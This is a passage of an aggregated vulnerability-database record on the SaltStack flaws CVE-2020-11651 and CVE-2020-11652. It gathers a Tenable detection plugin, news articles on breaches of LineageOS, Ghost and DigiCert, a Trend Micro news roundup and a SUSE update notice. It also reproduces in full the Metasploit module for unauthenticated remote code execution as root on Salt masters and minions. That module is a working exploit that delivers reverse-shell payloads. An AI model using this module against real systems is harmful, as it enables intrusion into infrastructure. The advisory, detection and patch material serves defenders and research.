salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=959684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4676\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the salt packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2018.3.4+dfsg1-6+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"salt\", reference:\"2018.3.4+dfsg1-6+deb10u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt\", reference:\"2016.11.2+ds-1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2020-05-06T09:43:58", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-QFI5pQTBAm4/Xq_m167flHI/AAAAAAAAASw/6k68kbyVKkMF27nKUuZ-tsrwehX-N5saACLcBGAsYHQ/s728-e100/saltstack-salt-rce-vulnerability.jpg>)\n\nDays after cybersecurity researchers sounded the alarm over two critical vulnerabilities in the [SaltStack configuration framework](<https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html>), a hacking campaign has already begun exploiting the flaws to breach servers of LineageOS, Ghost, and DigiCert. \n \nTracked as **CVE-2020-11651** and **CVE-2020-11652**, the disclosed flaws could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. The issues were fixed by SaltStack in a [release](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>) published on April 29th. \n \n\"We expect that any competent hacker will be able to create 100% reliable exploits for these issues in under 24 hours,\" F-Secure researchers had previously warned in an advisory last week. \n\n\n \nLineageOS, a maker of an open-source operating system based on Android, said it detected the intrusion on May 2nd at around 8 pm Pacific Time. \n \n\"Around 8 pm PST on May 2nd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure,\" the [company noted](<https://status.lineageos.org/issues/5eae596b4a0ebd114676545f>) in its incident report but added Android builds and signing keys were unaffected by the breach. \n \nGhost, a Node.js based blogging platform, also fell victim to the same flaw. In its status page, the developers noted that \"around 1:30 am UTC on May 3rd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure\" and install a cryptocurrency miner. \n \n\"The mining attempt spiked CPUs and quickly overloaded most of our systems, which alerted us to the issue immediately,\" [Ghost added](<https://status.ghost.org/incidents/tpn078sqk973>). \n \nGhost, however, confirmed there was no evidence the incident resulted in a compromise of customer data, passwords, and financial information. \n \nBoth LineageOS and Ghost have restored the services after taking the servers offline to patch the systems and secure them behind a new firewall. \n\n\n \nIn a separate development, the Salt vulnerability was used to hack into DigiCert certificate authority as well. \n \n\"We discovered today that [CT Log](<https://www.digicert.com/certificate-transparency/overview.htm>) 2's key used to sign SCTs (signed certificate timestamps) was compromised last night at 7 pm via the Salt vulnerability,\" DigiCert's VP of Product Jeremy Rowley said in a [Google Groups](<https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM>) post made on Sunday. \n \nIn an email conversation with The Hacker News, DigiCert also said it's deactivating its CT 2 log server following the incident but clarified that the other certificate transparency logs, CT 1, Yeti, and Nessie were not impacted. \n \n\"On May 3, DigiCert announced that it is deactivating its Certificate Transparency (CT) 2 log server after determining that the key used to sign SCTs may have been exposed via critical SALT vulnerabilities,\" the [company said](<https://www.digicert.com/digicert-statement-on-ct2-log/>). \n \n\"We do not believe the key was used to sign SCTs outside of the CT log's normal operation, though as a precaution, CAs that received SCTs from the CT2 log after May 2 at 5 pm MST should receive an SCT from another trusted log. Three other DigiCert CT logs: CT1, Yeti, and Nessie, are not affected as they are run on completely different infrastructure. The impacts are limited to only the CT2 log and no other part of DigiCert's CA or CT Log systems,\" \n \nWith F-Secure's alert revealing [more than 6,000 Salt vulnerable servers](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) that can be exploited via this vulnerability, if left unpatched, companies are advised to update the Salt software packages to the latest version to resolve the flaws.\n", "modified": "2020-05-06T08:18:06", "published": "2020-05-04T04:00:00", "id": "THN:00FCCD16591B1900512E0B089F2A6BC8", "href": "https://thehackernews.com/2020/05/saltstack-rce-exploit.html", "type": "thn", "title": "Hackers Breach LineageOS, Ghost, DigiCert Servers Using SaltStack Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-05-05T21:38:40", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-ydy9Fzk0nqU/XqwePD5OqUI/AAAAAAAAASk/uWabw7-xCao9P2D4zR41IqwAZjzcMPYywCLcBGAsYHQ/s728-e100/saltstack-remote-code-execution-vulnerability.jpg>)\n\nTwo severe security flaws have been discovered in the open-source [SaltStack Salt configuration framework](<https://www.saltstack.com/>) that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. \n \nThe vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack [released](<https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf>) a patch (version 3000.2) [addressing the issues](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>), rated with CVSS score 10. \n \n\"The vulnerabilities, allocated CVE IDs [CVE-2020-11651](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) and [CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), are of two different classes,\" the cybersecurity [firm said](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>). \n \n\"One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server.\" \n\n\n \nThe researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to [secure the Salt environment](<https://docs.saltstack.com/en/master/topics/hardening.html#general-hardening-tips>). \n \n\n\n## Vulnerabilities in ZeroMQ Protocol\n\n \n[Salt](<https://v/>) is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly. \n \nBuilt as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a \"master\" node that deploys the changes to a target group of \"minions\" (e.g., servers) en masse. \n \nThe [communication](<https://docs.saltstack.com/en/getstarted/system/communication.html>) between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a \"request server\" to which minions report the execution results and a \"publish server,\" where the master publishes messages that the minions can connect and subscribe to. \n \nAccording to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol. \n \n\"The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,\" the researchers said. \n \n\"The impact is full remote command execution as root on both the master and all minions that connect to it.\" \n \nIn other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands. \n\n\n \nWhat's more, a directory traversal vulnerability identified in the [wheel module](<https://docs.saltstack.com/en/master/ref/wheel/all/index.html>) \u2014 which has functions to read and write files to specific locations \u2014 can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths. \n \n\n\n## Detecting Vulnerable Salt Masters\n\n \nF-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet. \n \nDetecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. \"Exploitation of the authentication vulnerabilities will result in the ASCII strings \"_prep_auth_info\" or \"_send_pub\" appearing in data sent to the request server port (default 4506),\" it added. \n \nIt's highly recommended that Salt users update the software packages to the latest version. \n \n\"Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\" the researchers said.\n", "modified": "2020-05-04T09:00:21", "published": "2020-05-01T13:04:00", "id": "THN:8E401822CBD35E8E7CCE9E5DD922A70E", "href": "https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html", "type": "thn", "title": "Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2020-05-29T15:51:50", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how, over the past five years, the cybercriminal underground has seen a major shift to new platforms, communications channels, products, and services. Also, read about a new wave of Sandworm cyberattacks against email servers conducted by one of Russia's most advanced cyber-espionage units.\n\nRead on:\n\n[**How the Cybercriminal Underground Has Changed in 5 Years**](<https://blog.trendmicro.com/how-the-cybercriminal-underground-has-changed-in-5-years/>)\n\n_Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, it has seen a major shift to new platforms, communications channels, products, and services, as trust on the dark web erodes and new market demands emerge. Trend Micro expects the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities._\n\n[**Shadowserver, an Internet Guardian, Finds a Lifeline**](<https://www.wired.com/story/shadowserver-funding-trend-micro-internet-society/>)\n\n_In March, internet security group Shadowserver_ _learned that longtime corporate sponsor Cisco was ending its support. With just weeks to raise hundreds of thousands of dollars to move its data center out of Cisco's facility\u2014not to mention an additional $1.7 million to make it through the year\u2014the organization was at real risk of extinction. Ten weeks later, Shadowserver has come a long way toward securing its financial future. This week, Trend Micro committed $600,000 to Shadowserver over three years, providing an important backbone to the organization's fundraising efforts. _\n\n[**#LetsTalkSecurity: No Trust for the Wicked**](<https://trendtalks.fyi/security/>)** **\n\n_This Week, Rik Ferguson, vice president of Security Research at Trend Micro, hosted the fourth episode of #LetsTalkSecurity featuring guest Dave Lewis, Global Advisory CISO at Duo Security. Check out this week\u2019s episode and follow the link to find information about upcoming episodes and guests._\n\n[**Principles of a Cloud Migration \u2013 Security W5H \u2013 The HOW**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-security-w5h-the-how/>)\n\n_Security needs to be treated much like DevOps in evolving organizations, meaning everyone in the company has a shared responsibility to make sure it is implemented. It is not just a part of operations, but a cultural shift in doing things right the first time \u2013 security by default. In this blog from Trend Micro, learn 3 tips to get you started on your journey to securing the cloud. _\n\n[**What\u2019s Trending on the Underground Market?**](<https://www.helpnetsecurity.com/2020/05/27/underground-market-trends/>)\n\n_Trust has eroded among criminal interactions in the underground markets, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, a new Trend Micro report reveals._ _Determined efforts by law enforcement appear to be having an impact on the cybercrime underground as several forums have been taken down by global police entities. _\n\n[**Is Cloud Computing Any Safer from Malicious Hackers?**](<https://blog.trendmicro.com/is-cloud-computing-any-safer-from-malicious-hackers/>)\n\n_Cloud computing has revolutionized the IT world, making it easier for companies to deploy infrastructure and applications and deliver their services to the public. The idea of not spending millions of dollars on equipment and facilities to host an on-premises data center is a very attractive prospect to many. But is cloud computing any safer from malicious threat actors? Read this blog from Trend Micro to find out. _\n\n[**Smart Yet Flawed: IoT Device Vulnerabilities Explained**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/smart-yet-flawed-iot-device-vulnerabilities-explained>)\n\n_The variety and range of functions of smart devices present countless ways of improving different industries and environments. While the \u201cthings\u201d in the internet of things (IoT) benefits homes, factories, and cities, these devices can also introduce blind spots and security risks in the form of vulnerabilities. Vulnerable smart devices open networks to attack vectors and can weaken the overall security of the internet. For now, it is better to be cautious and understand that \u201csmart\u201d can also mean vulnerable to threats._\n\n[**Cyberattacks Against Hospitals Must Stop, Says Red Cross**](<https://www.zdnet.com/article/cyberattacks-against-hospitals-must-stop-says-red-cross/>)\n\n_Immediate action needs to be taken to stop cyberattacks targeting hospitals and healthcare organizations during the ongoing coronavirus pandemic \u2013 and governments around the world need to work together to make it happen, says a newly published open letter signed by the International Committee of the Red Cross, former world leaders, cybersecurity executives and others._\n\n[**Securing the 4 Cs of Cloud-Native Systems: Cloud, Cluster, Container, and Code**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/securing-the-4-cs-of-cloud-native-systems-cloud-cluster-container-and-code>)\n\n_Cloud-native technologies enable businesses to make the most of their cloud resources with less overhead, faster response times, and easier management._ _Like any technology that uses various interconnected tools and platforms, security plays a vital role in cloud-native computing. Cloud-native security adopts the defense-in-depth approach and divides the security strategies utilized in cloud-native systems into four different layers._\n\n[**Coinminers Exploit SaltStack Vulnerabilities CVE-2020-11651 and CVE-2020-11652**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/coinminers-exploit-saltstack-vulnerabilities-cve-2020-11651-and-cve-2020-11652>)\n\n_Researchers from F-Secure recently disclosed two high-severity vulnerabilities in SaltStack Salt: CVE-2020-11651, an authentication bypass vulnerability, and CVE-2020-11652, a directory traversal vulnerability. These can be exploited by remote, unauthenticated attackers, and all versions of SaltStack Salt before 2019.2.4 and 3000 before 3000.2 are affected. Trend Micro has witnessed attacks exploiting these vulnerabilities, notably those using cryptocurrency miners._\n\n[**PonyFinal Ransomware Targets Enterprise Servers Then Bides Its Time**](<https://threatpost.com/ponyfinal-ransomware-enterprise-servers/156083/>)\n\n_A Java-based ransomware known as PonyFinal has emerged, targeting enterprise systems management servers as an initial infection vector. It exfiltrates information about infected environments, spreads laterally and then waits before striking \u2014 the operators go on to encrypt files at a later date and time, when the likelihood of the target paying is deemed to be the most likely._\n\n[**Qakbot Resurges, Spreads through VBS Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files>)\n\n_Trend Micro has seen events that point to the resurgence of Qakbot, a multi-component, information-stealing threat first discovered in 2007. Feedback from Trend Micro\u2019s sensors indicates that Qakbot detections increased overall. A notable rise in detections of a particular Qakbot sample (detected by Trend Micro as Backdoor.Win32.QBOT.SMTH) was also witnessed in early April. _\n\n[**CSO Insights: SBV\u2019s Ian Keller on the Challenges and Opportunities of Working Remotely**](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/cso-insights-sbv-s-ian-keller-on-the-challenges-and-opportunities-of-working-remotely>)\n\n_The COVID-19 pandemic has forced businesses to change the way they operate. These abrupt changes come with a unique set of challenges, including security challenges. Ian Keller, Chief Security Officer of SBV Services in South Africa, sat down with Trend Micro and shared his thoughts on how SBV is coping with the current pandemic, the main challenges they faced when transitioning their staff to remote work, as well as how they plan to move forward._\n\n[**NSA Warns of New Sandworm Attacks on Email Servers**](<https://www.zdnet.com/article/nsa-warns-of-new-sandworm-attacks-on-email-servers/>)\n\n_The US National Security Agency (NSA) has published a security alert warning of a new wave of cyberattacks against email servers, attacks conducted by one of Russia's most advanced cyber-espionage units. The NSA says that members of Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, have been attacking email servers running the Exim mail transfer agent (MTA)._\n\n[**Forward-Looking Security Analysis of Smart Factories <Part 2> Security Risks of Industrial Application Stores**](<https://www.trendmicro.com/us/iot-security/news/5859/Forward_looking_security_analysis_of_smart_factories_Part_2_Security_risks_of_industrial_application_stores>)\n\n_In the second part of this five series column, Trend Micro looks at the security risks to be aware of when promoting smart factories by examining overlooked attack vectors, feasible attack scenarios, and recommended defense strategies. This column is especially applicable for architects, engineers, and developers who are involved in smart factory technology. _\n\n[**Factory Security Problems from an IT Perspective (Part 2): People, Processes, and Technology**](<https://www.trendmicro.com/us/iot-security/news/5844/Factory_Security_Problems_from_an_IT_Perspective_Part_2_People_processes_and_technology>)\n\n_This blog is the second in a series that discusses the challenges that IT departments face when they are assigned the task of overseeing cybersecurity in factories and implementing measures to overcome these challenges. In this article, Trend Micro carries out an analysis to uncover the challenges that lie in the way of promoting factory security from an IT perspective._\n\n[**21 Tips to Stay Secure, Private, and Productive as You Work from Home on Your Mac**](<https://blog.trendmicro.com/21-tips-to-stay-secure-private-and-productive-as-you-work-from-home-on-your-mac/>)\n\n_If you brought a Mac home from the office, it\u2019s likely already set up to meet your company\u2019s security policies. But what if you are using your personal Mac to work from home? You need to outfit it for business, to protect it and your company from infections and snooping, while ensuring it continues to run smoothly over time. In this blog, learn 21 tips for staying secure, private, and productive while working from home on your Mac. _\n\nSurprised by the new wave of Sandworm attacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers](<https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-05-29T12:27:26", "published": "2020-05-29T12:27:26", "id": "TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D", "href": "https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/", "type": "trendmicroblog", "title": "This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2020-04-30T22:32:50", "bulletinFamily": "unix", "description": "This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "modified": "2020-04-30T21:21:39", "published": "2020-04-30T21:21:39", "id": "OPENSUSE-SU-2020:0564-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html", "title": "Security update for salt (critical)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-05-17T09:39:05", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-12T00:00:00", "published": "2020-05-12T00:00:00", "id": "PACKETSTORM:157678", "href": "https://packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::ZeroMQ \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE', \n'Description' => %q{ \nThis module exploits unauthenticated access to the runner() and \n_send_pub() methods in the SaltStack Salt master's ZeroMQ request \nserver, for versions 2019.2.3 and earlier and 3000.1 and earlier, to \nexecute code as root on either the master or on select minions. \n \nVMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are \nknown to be affected by the Salt vulnerabilities. \n \nTested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as \nwell as Vulhub's Docker image. \n}, \n'Author' => [ \n'F-Secure', # Discovery \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-11651'], # Auth bypass (used by this module) \n['CVE', '2020-11652'], # Authed directory traversals (not used here) \n['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'], \n['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'], \n['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py'] \n], \n'DisclosureDate' => '2020-04-30', # F-Secure advisory \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Master (Python payload)', \n'Description' => 'Executing Python payload on the master', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Master (Unix command)', \n'Description' => 'Executing Unix command on the master', \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n], \n[ \n'Minions (Python payload)', \n'Description' => 'Executing Python payload on the minions', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Minions (Unix command)', \n'Description' => 'Executing Unix command on the minions', \n'Type' => :unix_command, \n'DefaultOptions' => { \n# cmd/unix/reverse_python_ssl crashes in this target \n'PAYLOAD' => 'cmd/unix/reverse_python' \n} \n] \n], \n'DefaultTarget' => 0, # Defaults to master for safety \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key' \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(4506), \nOptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/]) \n]) \n \nregister_advanced_options([ \nOptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n# NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key \n \ndef exploit \n# check.reason is from auxiliary/gather/saltstack_salt_root_key \nif target.name.start_with?('Master') \nunless (root_key = check.reason) \nfail_with(Failure::BadConfig, \n\"#{target['Description']} requires a root key\") \nend \n \nprint_good(\"Successfully obtained root key: #{root_key}\") \nend \n \n# These are from Msf::Exploit::Remote::ZeroMQ \nzmq_connect \nzmq_negotiate \n \nprint_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\") \n \ncase target.name \nwhen /^Master/ \nyeet_runner(root_key) \nwhen /^Minions/ \nyeet_send_pub \nend \n \n# HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one \nsleep(wfs_delay) \nrescue EOFError, Rex::ConnectionError => e \nprint_error(\"#{e.class}: #{e.message}\") \nensure \n# This is from Msf::Exploit::Remote::ZeroMQ \nzmq_disconnect \nend \n \ndef yeet_runner(root_key) \nprint_status(\"Yeeting runner() at #{peer}\") \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951 \nrunner = { \n'cmd' => 'runner', \n# https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd \n'fun' => 'salt.cmd', \n'kwarg' => { \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet' \n}, \n'user' => 'root', # This is NOT the Unix user! \n'key' => root_key # No JID needed, only the root key! \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nrunner['kwarg'].merge!( \n'fun' => 'cmd.exec_code', \n'lang' => payload.arch.first, \n'code' => payload.encoded \n) \nwhen :unix_command \n# HTTPS doesn't appear to be supported by the server :( \nprint_status(\"Serving intermediate stager over HTTP: #{start_service}\") \n \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script \nrunner['kwarg'].merge!( \n# cmd.run doesn't work due to a missing argument error, so we use this \n'fun' => 'cmd.script', \n'source' => get_uri, \n'stdin' => payload.encoded \n) \nend \n \nvprint_status(\"Unserialized clear load: #{runner}\") \nzmq_send_message(serialize_clear_load(runner)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive runner() response') \nend \n \nvprint_good(\"Received runner() response: #{res.inspect}\") \nend \n \ndef yeet_send_pub \nprint_status(\"Yeeting _send_pub() at #{peer}\") \n \n# NOTE: A unique JID (job ID) is needed for every published job \njid = generate_jid \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151 \nsend_pub = { \n'cmd' => '_send_pub', \n'kwargs' => { \n'bg' => true, \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet', \n'show_jid' => false, \n'show_timeout' => false \n}, \n'user' => 'root', # This is NOT the Unix user! \n'tgt' => datastore['MINIONS'].source, \n'tgt_type' => 'pcre', \n'jid' => jid \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nsend_pub.merge!( \n'fun' => 'cmd.exec_code', \n'arg' => [payload.arch.first, payload.encoded] \n) \nwhen :unix_command \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run \nsend_pub.merge!( \n'fun' => 'cmd.run', \n'arg' => [payload.encoded] \n) \nend \n \nvprint_status(\"Unserialized clear load: #{send_pub}\") \nzmq_send_message(serialize_clear_load(send_pub)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive _send_pub() response') \nend \n \nvprint_good(\"Received _send_pub() response: #{res.inspect}\") \n \n# NOTE: This path will likely change between platforms and distros \nregister_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\") \nend \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py \n# https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py \ndef generate_jid \nDateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N') \nend \n \n# HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP \ndef stager_instance \nnil \nend \n \n# HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP \ndef exe \n# NOTE: The shebang line is necessary in this case! \n<<~SHELL \n#!/bin/sh \n/bin/sh \nSHELL \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157678/saltstack_salt_unauth_rce.rb.txt"}, {"lastseen": "2020-05-06T09:22:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-05T00:00:00", "published": "2020-05-05T00:00:00", "id": "PACKETSTORM:157560", "href": 